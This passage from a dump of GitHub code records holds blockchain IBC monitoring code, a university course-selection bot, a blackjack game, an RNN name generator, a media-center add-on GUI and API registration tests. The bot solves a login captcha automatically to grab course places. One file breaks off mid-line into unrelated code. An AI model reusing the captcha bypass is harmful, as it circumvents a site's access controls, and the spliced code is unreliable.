rpc_node=self.rpc_node,\n                    page=page),\n                self.go_bin_folder))\n            clients.extend(client_query['client_states'])\n            if not client_query['pagination']['next_key']:\n                break\n            page += 1\n        return clients\n\n    \"\"\"\n    Description:\n    This method will get the current block height with the self.rpc_node.\n    \"\"\"\n\n    def get_current_block_height(self):\n        try:\n            current_height_request = requests.get(self.rpc_node + \"/status\").json()[\"result\"][\"sync_info\"][\n                \"latest_block_height\"]\n            return current_height_request\n        except Exception as e:\n            # concatenating the raw exception would raise a TypeError; use str(e)\n            self.log_it(\"RPC is having issues, did not return a json response for status: \" + str(e))\n
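\n    # Illustrative shape of the dict built by parse_transaction below\n    # (all field values here are hypothetical):\n    #   {\"packet_sequence\": \"42\", \"packet_source_channel\": \"channel-0\",\n    #    \"packet_dst_channel\": \"channel-141\", \"packet_connection\": \"connection-1\",\n    #    \"txhash\": \"ABCD...\", \"type\": \"send_packet\", \"height\": \"1000000\",\n    #    \"gas_wanted\": \"200000\", \"gas_used\": \"150000\", \"amount\": 1.0,\n    #    \"denom\": \"uatom\", \"receiver\": \"cosmos1...\", \"sender\": \"cosmos1...\"}\n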
json.loads(attribute[\"value\"])\n if \"denom\" in packet_data:\n found_transaction = True\n if attribute[\"key\"] == \"packet_sequence\" and found_transaction:\n packet_id = attribute[\"value\"]\n if attribute[\"key\"] == \"packet_src_channel\" and found_transaction:\n packet_src_channel = attribute[\"value\"]\n if attribute[\"key\"] == \"packet_dst_channel\" and found_transaction:\n packet_dst_channel = attribute[\"value\"]\n if attribute[\"key\"] == \"packet_connection\" and found_transaction:\n packet_connection = attribute[\"value\"]\n amount = float(packet_data[\"amount\"])\n denom = packet_data[\"denom\"]\n receiver = packet_data[\"receiver\"]\n sender = packet_data[\"sender\"]\n found_transaction_dict = {\"packet_sequence\": packet_id,\n \"packet_source_channel\": packet_src_channel,\n \"packet_dst_channel\": packet_dst_channel,\n \"packet_connection\": packet_connection,\n \"txhash\": txhash,\n \"type\": type,\n \"height\": height,\n \"gas_wanted\": gas_wanted,\n \"gas_used\": gas_used,\n \"amount\": amount,\n \"denom\": denom,\n \"receiver\": receiver,\n \"sender\": sender\n }\n return found_transaction_dict\n\n \"\"\"\n Description:\n This method will utilize the CLI to get the IBC packet commitments for the channel specified. Tried this with the API first but it was inconsistent at returning commitments.\n arg1: the channel you want to check commitments on\n arg2. the binary you want to use to check commitments\n arg3. the rpc node you want to use to check commitments.\n \"\"\"\n\n def get_packet_commitments_with_cli(self, channel, binary_name, rpc_node):\n page = 1\n commitments = []\n while True:\n try:\n client_query = json.loads(self.cli_command(\n \"{binary_name} q ibc channel packet-commitments transfer {from_channel} --node {rpc_node} --output json --page {page}\".format(\n binary_name=binary_name, rpc_node=rpc_node, from_channel=channel, page=page),\n self.go_bin_folder))\n commitments.extend(client_query['commitments'])\n if not client_query['pagination']['next_key']:\n break\n page += 1\n except Exception as e:\n self.log_it(str(e))\n return commitments\n return commitments\n\n \"\"\"\n Description:\n This method will utilize the CLI to get the IBC packet unreceived transactions for the channel specified. Tried this with the API first but it was inconsistent at returning unreceived transactions.\n arg1: the channel you want to check unreceived transactions on\n arg2. the binary you want to use to check unreceived transactions\n arg3. the rpc node you want to use to check unreceived transactions.\n arg4. string seperated list of packet sequence commitments.\n \"\"\"\n\n def get_packet_unreceived_with_cli_and_return_stuck_transactions(self, channel, binary_name, rpc_node,\n commitment_sequences):\n try:\n stuck_transactions = json.loads(self.cli_command(\n '{binary_name} q ibc channel unreceived-packets transfer {from_channel} --sequences=\"{sequences}\" --node {rpc_node} --output json '.format(\n binary_name=binary_name, rpc_node=rpc_node, from_channel=channel, sequences=commitment_sequences),\n self.go_bin_folder))\n except Exception as e:\n self.log_it(str(e))\n stuck_transactions = []\n\n return stuck_transactions\n\n \"\"\"\n Description:\n This method will utilze the rpc node specified at self.rpc_node to do a recursive event query on the\n event query passed as an argument and retrieve all data for all envs.\n arg 1. 
the event query you want to run.\n \"\"\"\n\n def recursive_rpc_event_query(self, event_query):\n packets_list = []\n page = 1\n while True:\n connection_url = '{rpc_url}/tx_search?query=\"{event_query}\"&page={page}'.format(rpc_url=self.rpc_node,\n event_query=event_query,\n page=page)\n try:\n request = requests.get(connection_url)\n except Exception as e:\n self.log_it(str(e))\n return packets_list\n\n if request.status_code == 200 or request.status_code == 201:\n request_data_object = request.json()\n if \"result\" in request_data_object:\n pages_total = int(request_data_object[\"result\"][\"total_count\"]) / 30 + 1\n pages_total = str(int(round(pages_total, 0)))\n if page > int(pages_total):\n break\n self.log_it(\"Building packet list: current page: {current_page} of {pages} total pages.\".format(\n current_page=page, pages=pages_total))\n packets_list += request_data_object[\"result\"][\"txs\"]\n page += 1\n else:\n self.log_it(request.status_code)\n self.log_it(request.content)\n break\n else:\n self.log_it(request.status_code)\n self.log_it(request.content)\n break\n self.log_it(\"Return Packet Lists\" + str(packets_list))\n return packets_list\n\n \"\"\"\n Description:\n This method will build the proper data object to parse for sent packets and their tx hash data.\n arg 1. build data object for sent packets.\n \"\"\"\n\n def build_sent_packets_data_structure(self, sent_packets):\n parsed_transactions = []\n for tx in sent_packets:\n parsed_transactions.append(self.parse_transaction(tx))\n return parsed_transactions\n\n \"\"\"\n Description:\n This method takes a list of packet commitment sequences and builds a comma seperated string.\n arg 1. list of packet commitment sequences.\n \"\"\"\n\n def build_string_comma_list_of_sequences_from_object(self, commitments):\n sequences = \"\"\n for commit in commitments:\n sequences = sequences + commit[\"sequence\"] + \",\"\n sequences = sequences[:-1]\n return sequences\n\n \"\"\"\n Description:\n This method parses the sent transactions and matches the sequences to see if the import is stuck.\n arg 1. stucket import packets, list of sent transactions with data.\n \"\"\"\n\n def parse_sent_transactions_and_match_stuck_packet_sequences(self, import_stuck_packets, parsed_transactions):\n stuck_import_transactions = []\n for packet in import_stuck_packets[\"sequences\"]:\n for sequence in parsed_transactions:\n if packet == sequence[\"packet_sequence\"]:\n packet_data = sequence\n stuck_import_transactions.append(packet_data)\n break\n return stuck_import_transactions\n\n \"\"\"\n Description:\n This method looks for and parses a data object for stuck transactions.\n arg 1. destination rpc node you want to look at.\n arg 2. source rpc node you want to use\n arg 3. destination channel of your IBC queue\n arg 4. destination connection of your IBC queue\n arg 5. source channel of your IBC queue\n arg 6. source connection of your IBC queue\n arg 7. 
binary name you want to run queries with\n    \"\"\"\n\n    def look_for_stuck_transactions(self, external_node_rpc, import_node_rpc, destination_channel,\n                                    destination_connection, source_channel, source_connection, binary_name):\n        # These values are set on the instance for each call (overwriting whatever\n        # __init__ set) so this method can be looped over a list of configurations.\n\n        self.destination_channel = destination_channel\n        self.destination_connection = destination_connection\n        self.source_channel = source_channel\n        self.source_connection = source_connection\n        self.binary_name = binary_name\n        self.rpc_node = import_node_rpc\n        # lists of parsed stuck transactions (kept as lists even when empty)\n        stuck_import_transactions = []\n        stuck_export_transactions = []\n        commitments = self.get_packet_commitments_with_cli(self.destination_channel, self.binary_name, import_node_rpc)\n        sequences = self.build_string_comma_list_of_sequences_from_object(commitments)\n        if sequences:\n            export_stuck_packets = self.get_packet_unreceived_with_cli_and_return_stuck_transactions(\n                self.source_channel,\n                self.binary_name,\n                external_node_rpc,\n                sequences)\n\n            self.rpc_node = import_node_rpc\n            sent_packets = self.recursive_rpc_event_query(\n                \"send_packet.packet_connection=\\'{connection}\\'\".format(connection=self.source_connection))\n            send_transactions_data_object = self.build_sent_packets_data_structure(sent_packets)\n            stuck_export_transactions = self.parse_sent_transactions_and_match_stuck_packet_sequences(\n                export_stuck_packets,\n                send_transactions_data_object)\n\n        commitments = self.get_packet_commitments_with_cli(self.source_channel, self.binary_name, external_node_rpc)\n        sequences = self.build_string_comma_list_of_sequences_from_object(commitments)\n        if sequences:\n            import_stuck_packets = self.get_packet_unreceived_with_cli_and_return_stuck_transactions(\n                self.destination_channel, self.binary_name, import_node_rpc, sequences)\n\n            self.rpc_node = external_node_rpc\n            sent_packets = self.recursive_rpc_event_query(\n                \"send_packet.packet_connection=\\'{connection}\\'\".format(connection=self.destination_connection))\n            send_transactions_data_object = self.build_sent_packets_data_structure(sent_packets)\n            stuck_import_transactions = self.parse_sent_transactions_and_match_stuck_packet_sequences(\n                import_stuck_packets,\n                send_transactions_data_object)\n\n        return stuck_import_transactions, stuck_export_transactions\n\n    \"\"\"\n    Description:\n    This method takes the list of stuck transactions, chain info, and the type IMPORT or EXPORT and pushes a log into datadog from\n    the list of parsed transactions.\n    arg 1. list of json dictionaries representing the stuck transactions.\n    arg 2. Information about the chains ex. \"source_chain_id/destination_chain_id\"\n    arg 3. tx type you are logging for i.e. EXPORT or IMPORT\n
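    Example of the resulting tag string (values here are illustrative):\n        cluster_name:chainops,env:betanet,tx_type:EXPORT,chains:cosmoshub-4/osmosis-1\n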
    \"\"\"\n\n    def send_datadog_log(self, stuck_txs, chains, type_tx):\n        configuration = Configuration()\n        for stuck_tx in stuck_txs:\n            dd_tags = 'cluster_name:chainops,env:betanet,tx_type:{tx_type},chains:{chains}'.format(tx_type=type_tx,\n                                                                                                   chains=chains)\n            message = {\"packet_sequence\": str(stuck_tx[\"packet_sequence\"]),\n                       \"packet_source_channel\": str(stuck_tx[\"packet_source_channel\"]),\n                       \"packet_dst_channel\": str(stuck_tx[\"packet_dst_channel\"]),\n                       \"packet_connection\": str(stuck_tx[\"packet_connection\"]),\n                       \"txhash\": str(stuck_tx[\"txhash\"]),\n                       \"height\": str(stuck_tx[\"height\"]),\n                       \"gas_wanted\": str(stuck_tx[\"gas_wanted\"]),\n                       \"gas_used\": str(stuck_tx[\"gas_used\"]),\n                       \"amount\": str(stuck_tx[\"amount\"]),\n                       \"denom\": str(stuck_tx[\"denom\"]),\n                       \"receiver\": str(stuck_tx[\"receiver\"]),\n                       \"sender\": str(stuck_tx[\"sender\"]),\n                       \"chains\": chains,\n                       \"type_tx\": type_tx}\n            message = json.dumps(message)\n\n            with ApiClient(configuration) as api_client:\n                api_instance = logs_api.LogsApi(api_client)\n                body = HTTPLog([\n                    HTTPLogItem(\n                        ddsource=\"ibc-stuck-transactions\",\n                        ddtags=dd_tags,\n                        service=\"ibc-stuck-transactions\",\n                        hostname=chains,\n                        message=message\n                    ),\n                ])\n                try:\n                    api_response = api_instance.submit_log(body)\n                    self.log_it(api_response)\n                except ApiException as e:\n                    self.log_it(\"Exception when calling LogsApi->submit_log: %s\\\\n\" % e)\n","repo_name":"Sifchain/sifchain-validators","sub_path":"scripts/ibc-tools/examples/lib/CosmosIBC.py","file_name":"CosmosIBC.py","file_ext":"py","file_size_in_byte":26130,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"}
{"seq_id":"34682150124","text":"# Automated Course Selection (ACS)\n# Created by Cheng Xinlun @Tsinghua University, 2015/09/18\n# First draft finished debugging @Tsinghua University, 2015/09/20\n# Major improvement @Tsinghua University, 2017/05/15\n\n# Dependencies\n# 1. Python 3\n# 2. requests, Pillow\n# 3. 
scikit-image (skimage)\n\n\n# Import necessary modules\nimport requests\nimport urls\nimport ipro\nimport headers\n\n\n# Self-defined class for exception\nclass XKException(Exception):\n pass\n\n\n# Class for class selection\nclass XuanKe():\n def __init__(self, sem, cc, cn, cs, user, pswd):\n # Variable initialization\n self.semester = sem\n self.class_class = cc\n self.class_number = cn\n self.class_subnumber = cs\n self.user = user\n self.pswd = pswd\n self.gettoken_data = {\"m\": self.class_class + \"Search\",\n \"p_xnxq\": self.semester,\n \"tokenPriFlag\": self.class_class, \"is_zyrxk\": \"1\"}\n self.login_webaddr = urls.urlCook\n self.validator = urls.urlVali\n self.captcha_addr = urls.urlCapt\n self.login_postaddr = urls.urlLogi\n self.xkaddr = urls.urlCous\n # Generic header\n self.gheader = headers.headGene\n # Login header construction\n self.lheader = headers.headGene\n self.lheader.update(headers.headAcce)\n self.lheader.update(headers.headCook)\n\n # Login and get captcha\n def login(self):\n while True:\n s = requests.Session()\n responce = s.get(self.login_webaddr, headers=self.gheader)\n if responce.url != self.login_webaddr:\n s.close()\n continue\n get_check = s.get(self.validator, headers=self.gheader)\n if get_check.url != self.validator:\n s.close()\n continue\n captcha_responce = s.get(self.captcha_addr, headers=self.gheader)\n if captcha_responce.url != self.captcha_addr:\n s.close()\n continue\n # Get and save captcha into file named with the picture md5\n output_captcha = open(\"temp.jpg\", \"bw\")\n output_captcha.write(captcha_responce.content)\n output_captcha.close()\n # Captcha\n captcha = ipro.iip(\"temp.jpg\")\n print(captcha)\n # Login post data construct\n self.login_data = {\"j_username\": self.user,\n \"j_password\": self.pswd,\n \"captchaflag\": \"login1\",\n \"_login_image_\": captcha}\n login_res = s.post(self.login_postaddr, self.login_data,\n headers=self.lheader, verify=False)\n if login_res.url != urls.urlCous + \"?m=main\":\n s.close()\n continue\n break\n return s\n\n # Get token for the first time from returned webpage\n def gettoken(self, s):\n gettoken_res = s.post(self.xkaddr, self.gettoken_data,\n headers=self.gheader)\n if gettoken_res.url != self.xkaddr:\n s.close()\n raise XKException(\"Kicked offline. 
Relogining...\")\n token = gettoken_res.text.split(\n \" 21 and have_ace:\n score -= 10 # lower ace value\n have_ace = False # only do this once\n return score\n\ndef display_hand(hand):\n score = score_hand(hand)\n print('Your hand: ' + str(hand) + ' (' + str(score) + ')')\n\ndef play_game():\n deck = Deck()\n deck.shuffle()\n hand = []\n deck.deal(2, hand)\n while True:\n display_hand(hand)\n action = input('t-twist or s-stick: ')\n if action == 't':\n deck.deal(1, hand)\n elif action == 's':\n print('Sticking')\n break\n \nplay_game()","repo_name":"simonmonk/coding_book","sub_path":"python/06_card_game/blackjack_2.py","file_name":"blackjack_2.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"73138980679","text":"import os\nimport types\nimport json\nimport random\n\nfrom util import *\nfrom rnn import *\n\ncuda = False\nnum_processes = 12\n\n\nclass Country:\n def __init__(self, path):\n self.path = path\n self.datasets = {\n \"female\": os.path.join(path, \"female.txt\"),\n \"male\": os.path.join(path, \"male.txt\"),\n \"surname\": os.path.join(path, \"surname.txt\"),\n }\n\n # initialise the pre and post proccess function lists\n self.pre_process = []\n self.post_process = []\n\n # load the data file\n self.load_data()\n\n # load the alphabet file\n self.alphabet = self.load_alphabet()\n\n # initialise the rnn models\n hidden_size = 128\n self.rnn = {}\n\n for dataset in self.datasets:\n self.rnn[dataset] = RNN(\n len(self.alphabet), hidden_size, len(self.alphabet))\n\n \"\"\" Load the alphabet from the alphabet file\n Returns:\n alphabet: (str[]) the list of the letters/characters to use while training\n \"\"\"\n\n def load_alphabet(self):\n alphabet_path = os.path.join(self.path, \"alphabet.txt\")\n\n # check if the alphabet file exists, if not, raise an exception\n if os.path.exists(alphabet_path):\n with open(alphabet_path, \"r\") as alphabet_file:\n # Split the file by lines: on letter/character should be on each line\n letters = alphabet_file.read().split(\"\\n\")\n return letters\n else:\n raise Exception(\n f\"The alphabet file {alphabet_path} could not be found\")\n return []\n\n \"\"\" load the data from the data file\n \"\"\"\n\n def load_data(self):\n data_path = os.path.join(self.path, \"data.json\")\n if os.path.exists(data_path):\n with open(data_path, \"r\") as data_file:\n j = json.loads(data_file.read())\n\n # match the imported global function with the ones listed in the json file\n for pre in j[\"pre\"]:\n if pre in globals():\n func = globals()[pre]\n\n # check if the requested object is a function\n if type(func) is types.FunctionType:\n self.pre_process.append(func)\n else:\n raise Exception(\n f\"The function '{pre}' is not a function\")\n else:\n # If the function was not loaded, throw an exception\n raise Exception(\n f\"The function '{pre}' was not loaded or does not exist\")\n\n for post in j[\"post\"]:\n if post in globals():\n func = globals()[post]\n\n # check if the requested object is a function\n if type(func) is types.FunctionType:\n self.post_process.append(func)\n else:\n raise Exception(\n f\"The function '{post}' is not a function\")\n else:\n # If the function was not loaded, throw an exception\n raise Exception(\n f\"The function '{post}' was not loaded or does not exist\")\n\n else:\n # load the default pre and post processing functions\n self.pre_process = [uncapitalise]\n self.post_process = [deserialise, capitalise]\n\n \"\"\" List all 
the names from a given category file\n Args:\n category: (str) the category to select names from\n Returns:\n data: (str[]) an array containing all of the names from the given category file\n \"\"\"\n\n def get_names(self, category):\n with open(self.datasets[category], \"r\") as datafile:\n return [name for name in datafile.read().split(\"\\n\")]\n\n \"\"\" List all names in all categories\n Returns:\n data: (str[]) an array with all of the names in this country's datasets\n \"\"\"\n\n def get_all(self):\n return [name for k in self.datasets for name in self.get_names(k)]\n\n \"\"\" Pre-process a name for training\n Args:\n name: the name loaded from the dataset\n Returns:\n name: the name after being processed\n \"\"\"\n\n def postprocess(self, name):\n for f in self.post_process:\n name = f(name)\n return name\n\n \"\"\" Post-process a name after sampling\n Args:\n name: the name output from the recurrent neural network\n Returns:\n name: the name after being processed\n \"\"\"\n\n def preprocess(self, name):\n for f in self.pre_process:\n name = f(name)\n return name\n\n \"\"\" Train a neural network on the given dataset\n Args:\n category: (str) the category to sample training names from\n \"\"\"\n\n def train(self, category):\n # select the RNN model to be training on\n rnn = self.rnn[category]\n\n # load names from that dataset and pre proccess them\n print(\"preprocessing names...\")\n names = [self.preprocess(name) for name in self.get_names(category)]\n print(f\"processed {len(names)} names!\")\n\n # calculate optimum number of iterations (using 80% of whole dataset)\n iters = int(len(names) * 0.8)\n\n # start training\n learn_names(rnn, names, self.alphabet, iterations=iters,\n num_processes=num_processes)\n\n \"\"\" Sample a name from the neural network with a given starting letter\n Args:\n category: (str) the category to sample generated names from\n Returns:\n name: the output from the neural network\n \"\"\"\n\n def sample(self, category, start_letter):\n\n # select the RNN model to be sampling from\n rnn = self.rnn[category]\n\n # set the random factor of the RNN to randomise names that are generated\n rnn.random_factor = 0.7\n\n # call the rnn sample function to generate a single name\n name = sample(rnn, self.alphabet, start_letter)\n\n # post process the name and return\n return self.postprocess(name)\n\n \"\"\" Load the rnn from its file\n Args:\n category: (str) the category to load\n parent_directory: (str) where to find the model\n \"\"\"\n\n def load_rnn(self, category, parent_directory):\n model_file = os.path.join(parent_directory, f\"{category}.pt\")\n self.rnn[category] = torch.load(model_file)\n\n \"\"\" Save the rnn of a given category to its file\n Args:\n category: (str) the category to save\n parent_directory: (str) the directory to save the model file to \n \"\"\"\n\n def save_rnn(self, category, parent_directory):\n rnn = self.rnn[category]\n model_file = os.path.join(parent_directory, f\"{category}.pt\")\n torch.save(rnn, model_file)\n\n\ndef get_countries():\n return {\n country: Country(os.path.join(countries_path, country)) for country in os.listdir(countries_path) if os.path.isdir(os.path.join(countries_path, country))\n }\n\n\n\"\"\" train all of the datasets from a specific country\n Args:\n country: (Country) \n\"\"\"\n\n\ndef train_country(country, name):\n datasets = country.datasets\n for dataset in datasets:\n print(f\"Training {dataset} in {name}\")\n country.train(dataset)\n\n print(f\"Finished training on {dataset}... 
saving...\", end=\"\")\n path = os.path.join(\"data\", \"models\", name)\n\n # check if the path already exists before trying to make directories\n if not os.path.exists(path):\n os.makedirs(path)\n\n country.save_rnn(dataset, path)\n print(\"saved!\")\n\n\ndef sample_country(country, country_name, number_of_samples=10000):\n\n datasets = country.datasets\n for dataset in datasets:\n\n # ensure that the model exists before sampling\n path = os.path.join(\"data\", \"models\", country_name)\n if os.path.exists(os.path.join(path, dataset + \".pt\")):\n\n # load the country's rnn\n country.load_rnn(dataset, path)\n\n # load the names from the country's dataset, and pre-process them\n names = [country.preprocess(name)\n for name in country.get_names(dataset)]\n\n # make a dictionary full of start letters and their frequency\n start_letters = {}\n\n for name in names:\n if len(name) > 0:\n start_letter = name[0]\n\n # if the start letter isn't already in the dictionary, add it with value 1\n if start_letter in start_letters:\n start_letters[start_letter] += 1\n else:\n start_letters[start_letter] = 1\n\n # turn each integer count into a float where: letter_weight=frequency/total_names\n total = len(names)\n\n for letter in start_letters:\n weight = float(start_letters[letter] / total)\n start_letters[letter] = weight\n\n # sample names from the RNN\n sampled_names = []\n\n for i in range(number_of_samples):\n try:\n letter = weighted_choice(start_letters)\n sample = country.sample(dataset, letter)\n sampled_names.append(sample)\n except:\n pass\n\n # remove duplicate names\n sampled_names = list(dict.fromkeys(sampled_names))\n\n # create a sqlite connection\n connection = sqlite3.connect(database)\n\n # always close the connection when finished\n with connection:\n cursor = connection.cursor()\n for name in sampled_names:\n sql = \"INSERT INTO names(Name, Origin, Category) VALUES(?, ?, ?)\"\n\n # insert the current name and options into the database\n cursor.execute(sql, (name, country_name, dataset))\n\n # commit changes and save the database\n connection.commit()\n\n print(\n f\"Saved {len(sampled_names)} names for {country_name}/{dataset}\")\n\n else:\n print(f\"the model: {country_name}/{dataset} was not found.\")\n\n\ncountries_path = \"data/datasets\"\ndatabase = os.path.join(\"data\", \"names.db\")\nif __name__ == \"__main__\":\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n # allow processes on this model to share memory\n torch.multiprocessing.set_start_method('spawn')\n\n # List all the directories containing country datasets to populate the countries dictionary\n countries = get_countries()\n\n country_count = len(countries)\n # Display debug information\n print(f\"Loaded {country_count} countries!\")\n\n # list all countries in neat collumns\n collumns = 4\n width = 14\n i = 0\n for country in countries:\n i += 1\n\n # print the country and then its index\n print(country, end=\"\")\n\n # organise into rows and collumns\n if i % collumns == 0:\n print(\"\")\n else:\n # separate collumns with spaces\n print(\" \" * (width - len(country)), end=\"\")\n\n # keep asking until the country selection is valid\n good_selection = False\n while not good_selection:\n # prompt user to select a country to train, or train all\n country_selection = input(\n \"select the name of a country to train on, or (all) to train on all countries: \")\n\n good_selection = True\n selected_countries = []\n\n # if the user selected all, then add all countries to list, if not, add the 
selected country\n if country_selection.lower() == \"all\":\n [selected_countries.append(country) for country in countries]\n elif country_selection.lower() in countries:\n selected_countries.append(country_selection)\n else:\n print(\"Country not found, try again\")\n good_selection = False\n\n choice = input(\"(t)rain on data, or (s)ample from weights?\")\n\n if choice.lower()[0] == \"t\":\n for country in selected_countries:\n train_country(countries[country], country)\n\n elif choice.lower()[0] == \"s\":\n create_table(database)\n for country in selected_countries:\n sample_country(countries[country], country)\n","repo_name":"davidovski/name-generator","sub_path":"src/neuralnetwork/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":12758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22473848831","text":"import json\nimport os\nimport socket\nfrom contextlib import closing\n\nimport xbmcaddon\nimport xbmcgui\nfrom osmccommon.osmc_language import LangRetriever\nfrom osmccommon.osmc_logging import StandardLogger\nfrom osmccommon.osmc_logging import clog\n\nADDON_ID = \"script.module.osmcsetting.apfstore\"\n\nlog = StandardLogger(ADDON_ID, os.path.basename(__file__)).log\n\n\nclass APFGui(xbmcgui.WindowXMLDialog):\n\n def __init__(self, strXMLname, strFallbackPath, strDefaultName, apf_dict, addon=None):\n super(APFGui, self).__init__(xmlFilename=strXMLname,\n scriptPath=strFallbackPath,\n defaultSkin=strDefaultName)\n self.apf_dict = apf_dict\n\n self._addon = addon\n self._lang = None\n self._path = ''\n\n self.list_control = None\n self.addon_gui = None\n\n self.apf_order_list = []\n\n self.action_dict = {}\n\n def onInit(self):\n\n self.list_control = self.getControl(500)\n self.list_control.setVisible(True)\n\n for key, value in self.apf_dict.items():\n self.list_control.addItem(value)\n self.apf_order_list.append(key)\n\n try:\n self.getControl(50).setVisible(False)\n except:\n pass\n\n self.check_action_dict()\n\n @property\n def addon(self):\n if not self._addon:\n self._addon = xbmcaddon.Addon(ADDON_ID)\n return self._addon\n\n def lang(self, value):\n if not self._lang:\n retriever = LangRetriever(self.addon)\n self._lang = retriever.lang\n return self._lang(value)\n\n @property\n def path(self):\n if not self._path:\n self._path = self.addon.getAddonInfo('path')\n return self._path\n\n @clog(logger=log)\n def check_action_dict(self):\n\n install = 0\n removal = 0\n\n for _, value in self.action_dict.items():\n if value == 'Install':\n install += 1\n\n elif value == 'Uninstall':\n removal += 1\n\n if not install and not removal:\n self.getControl(6).setVisible(False)\n self.getControl(61).setVisible(False)\n self.getControl(62).setVisible(False)\n return\n\n if install:\n self.getControl(61).setLabel(self.lang(32001) % install)\n self.getControl(6).setVisible(True)\n self.getControl(61).setVisible(True)\n\n else:\n self.getControl(61).setVisible(False)\n\n if removal:\n self.getControl(62).setLabel(self.lang(32002) % removal)\n self.getControl(6).setVisible(True)\n self.getControl(62).setVisible(True)\n\n else:\n self.getControl(62).setVisible(False)\n\n @clog(logger=log)\n def onClick(self, controlID):\n\n if controlID == 500:\n container = self.getControl(500)\n\n sel_pos = container.getSelectedPosition()\n sel_item = self.apf_dict[self.apf_order_list[sel_pos]]\n\n xml = \"APFAddonInfo_720OSMC.xml\" \\\n if xbmcgui.Window(10000).getProperty(\"SkinHeight\") == '720' \\\n else 
\"APFAddonInfo_OSMC.xml\"\n\n self.addon_gui = AddonInfoGui(xml, self.path, 'Default',\n sel_item=sel_item, addon=self.addon)\n self.addon_gui.doModal()\n\n ending_action = self.addon_gui.action\n\n if ending_action == 'Install':\n self.action_dict[sel_item.id] = 'Install'\n\n elif ending_action == 'Uninstall':\n self.action_dict[sel_item.id] = 'Uninstall'\n\n elif sel_item.id in self.action_dict:\n del self.action_dict[sel_item.id]\n\n self.check_action_dict()\n del self.addon_gui\n log(self.action_dict)\n\n elif controlID == 7:\n self.close()\n\n elif controlID == 6:\n # send install and removal list to Update Service\n action_list = [\n 'install_' + k\n if v == 'Install'\n else 'removal_' + k\n for k, v in self.action_dict.items()\n ]\n action_string = '|=|'.join(action_list)\n\n self.contact_update_service(action_string)\n self.close()\n\n @clog(logger=log)\n def contact_update_service(self, action_string):\n message = ('action_list', {\n 'action': action_string\n })\n\n message = json.dumps(message)\n\n with closing(socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)) as open_socket:\n open_socket.connect('/var/tmp/osmc.settings.update.sockfile')\n if not isinstance(message, (bytes, bytearray)):\n message = message.encode('utf-8', 'ignore')\n open_socket.sendall(message)\n\n\nclass AddonInfoGui(xbmcgui.WindowXMLDialog):\n \"\"\"\n Controls\n ==============================\n 50001\tShortdesc\n 50002\tLongdesc\n 50003\tVersion\n 50004\tMaintainer\n 50005\tLastUpdated\n 50006\tIcon\n 50007\tName\n \"\"\"\n\n def __init__(self, strXMLname, strFallbackPath, strDefaultName, sel_item, addon=None):\n super(AddonInfoGui, self).__init__(xmlFilename=strXMLname,\n scriptPath=strFallbackPath,\n defaultSkin=strDefaultName)\n\n self._addon = addon\n self._lang = None\n self.action = False\n self.sel_item = sel_item\n\n def onInit(self):\n self.getControl(50001).setLabel(self.sel_item.shortdesc)\n self.getControl(50002).setText(self.sel_item.longdesc)\n self.getControl(50003).setLabel(self.sel_item.version)\n self.getControl(50004).setLabel(self.sel_item.maintainedby)\n self.getControl(50005).setLabel(self.sel_item.lastupdated)\n self.getControl(50006).setImage(self.sel_item.current_icon, True)\n self.getControl(50007).setLabel(self.sel_item.name)\n\n if self.sel_item.installed:\n self.getControl(6).setLabel(self.lang(32004))\n\n else:\n self.getControl(6).setLabel(self.lang(32003))\n\n @property\n def addon(self):\n if not self._addon:\n self._addon = xbmcaddon.Addon(ADDON_ID)\n return self._addon\n\n def lang(self, value):\n if not self._lang:\n retriever = LangRetriever(self.addon)\n self._lang = retriever.lang\n return self._lang(value)\n\n def onClick(self, controlID):\n if controlID == 6:\n lbl = self.getControl(6).getLabel()\n\n if lbl == self.lang(32003):\n self.action = 'Install'\n else:\n self.action = 'Uninstall'\n\n self.close()\n\n elif controlID == 7:\n self.close()\n","repo_name":"osmc/osmc","sub_path":"package/mediacenter-addon-osmc/src/script.module.osmcsetting.apfstore/resources/lib/apfstore/apf_gui.py","file_name":"apf_gui.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","stars":1587,"dataset":"github-code","pt":"63"} +{"seq_id":"36448702639","text":"from lib.my_requests import MyRequests\r\nfrom lib.base_case import BaseCase\r\nfrom lib.assertions import Assertions\r\nimport pytest\r\nfrom random import choices\r\nimport string\r\nimport allure\r\n\r\n\r\n# python -m pytest -s tests/test_user_register.py -k 
test_create_user_successfully\r\n# python -m pytest -s tests/test_user_register.py -k test_create_user_with_existing_email\r\n\r\n# Homework: ex. 15 Test user method\r\n# python -m pytest -s tests/test_user_register.py -k test_create_user_with_invalid_email\r\n# python -m pytest -s tests/test_user_register.py -k test_create_user_with_one_field_missing\r\n# python -m pytest -s tests/test_user_register.py -k test_name_fields_lengths_while_user_creation\r\n\r\n\r\n@allure.epic(\"Registration cases\")\r\nclass TestUserRegister(BaseCase):\r\n missing_fields = [\r\n \"password\",\r\n \"username\",\r\n \"firstName\",\r\n \"lastName\",\r\n \"email\"\r\n ]\r\n\r\n lengths = [\r\n 1,\r\n 251\r\n ]\r\n\r\n names = [\r\n \"username\" # ,\r\n # \"firstName\",\r\n # \"lastName\"\r\n ]\r\n\r\n @allure.title(\"Create user successfully\")\r\n @allure.description(\"This test creates user successfully.\")\r\n @allure.label(\"Positive/Negative\", 'Positive')\r\n @allure.severity(allure.severity_level.BLOCKER)\r\n def test_create_user_successfully(self):\r\n data = self.prepare_registration_data()\r\n\r\n response = MyRequests.post(\"/user\", data=data)\r\n\r\n Assertions.assert_code_status(response, 200)\r\n Assertions.assert_json_has_key(response, \"id\")\r\n\r\n @allure.title(\"Attempt to create a user with existing email\")\r\n @allure.description(\"This test checks user creation with existing email.\")\r\n @allure.label(\"Positive/Negative\", 'Negative')\r\n @allure.severity(allure.severity_level.CRITICAL)\r\n def test_create_user_with_existing_email(self):\r\n email = 'vinkotov@example.com'\r\n data = self.prepare_registration_data(email)\r\n\r\n response = MyRequests.post(\"/user\", data=data)\r\n\r\n Assertions.assert_code_status(response, 400)\r\n Assertions.assert_decoded_content(response, f\"Users with email '{email}' already exists\")\r\n\r\n @allure.title(\"Attempt to create a user with invalid email\")\r\n @allure.description(\"This test 